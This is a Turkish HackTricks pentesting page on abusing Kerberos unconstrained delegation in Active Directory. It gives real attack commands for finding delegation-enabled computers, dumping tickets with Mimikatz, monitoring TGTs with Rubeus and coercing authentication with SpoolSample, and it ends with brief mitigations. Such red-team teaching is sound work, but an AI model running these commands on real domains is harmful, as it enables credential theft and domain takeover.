Unconstrained Delegation

Reading time: 3 minutes

tip

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
Bize katılın 💬 Discord grubuna veya telegram grubuna veya bizi takip edin Twitter'da 🐦 @hacktricks_live.
Hacking ipuçlarını paylaşın, HackTricks ve HackTricks Cloud github reposuna PR göndererek.

Unconstrained delegation

Bu, bir Alan Yöneticisinin alan içindeki herhangi bir Bilgisayar için ayarlayabileceği bir özelliktir. Daha sonra, bir kullanıcı Bilgisayara giriş yaptığında, o kullanıcının TGT'sinin bir kopyası DC tarafından sağlanan TGS'ye gönderilecek ve LSASS'ta bellekte saklanacaktır. Yani, makinede Yönetici ayrıcalıklarınız varsa, biletleri dökebilir ve kullanıcıları herhangi bir makinede taklit edebilirsiniz.

Bu nedenle, "Unconstrained Delegation" özelliği etkinleştirilmiş bir Bilgisayara giriş yapan bir alan yöneticisi varsa ve o makinede yerel yönetici ayrıcalıklarınız varsa, bileti dökebilir ve Alan Yöneticisini her yerde taklit edebilirsiniz (alan privesc).

Bu özelliğe sahip Bilgisayar nesnelerini bulabilirsiniz; userAccountControl niteliğinin ADS_UF_TRUSTED_FOR_DELEGATION içerip içermediğini kontrol ederek. Bunu ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’ LDAP filtresi ile yapabilirsiniz; bu, powerview'ün yaptığıdır:

# List unconstrained computers
## Powerview
Get-NetComputer -Unconstrained #DC'ler her zaman görünür ama privesc için faydalı değildir
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Export tickets with Mimikatz
privilege::debug
sekurlsa::tickets /export #Tavsiye edilen yol
kerberos::list /export #Başka bir yol

# Monitor logins and export new tickets
.\Rubeus.exe monitor /targetuser: /interval:10 #Yeni TGT'ler için her 10 saniyede bir kontrol et

Yönetici (veya kurban kullanıcının) biletini bellekte Mimikatz veya Rubeus ile yükleyin Pass the Ticket** için.**
Daha fazla bilgi: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
Unconstrained delegation hakkında daha fazla bilgi ired.team'de.

Force Authentication

Eğer bir saldırgan "Unconstrained Delegation" için izin verilen bir bilgisayarı ele geçirebilirse, bir Yazıcı sunucusunu otomatik olarak giriş yapmaya kandırabilir ve bu da sunucunun belleğinde bir TGT kaydedebilir.
Daha sonra, saldırgan Kullanıcı Yazıcı sunucu bilgisayar hesabını taklit etmek için bir Pass the Ticket saldırısı gerçekleştirebilir.

Bir yazıcı sunucusunun herhangi bir makineye giriş yapmasını sağlamak için SpoolSample kullanabilirsiniz:

bash

.\SpoolSample.exe <printmachine> <unconstrinedmachine>

Eğer TGT bir etki alanı denetleyicisinden geliyorsa, bir DCSync attack gerçekleştirebilir ve DC'den tüm hash'leri elde edebilirsiniz.
Bu saldırı hakkında daha fazla bilgi ired.team'de.

Kimlik doğrulamayı zorlamak için diğer yollar:

Force NTLM Privileged Authentication

Mitigasyon

DA/Admin oturum açmalarını belirli hizmetlerle sınırlayın
Ayrıcalıklı hesaplar için "Hesap hassastır ve devredilemez" ayarını yapın.

tip

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
Bize katılın 💬 Discord grubuna veya telegram grubuna veya bizi takip edin Twitter'da 🐦 @hacktricks_live.
Hacking ipuçlarını paylaşın, HackTricks ve HackTricks Cloud github reposuna PR göndererek.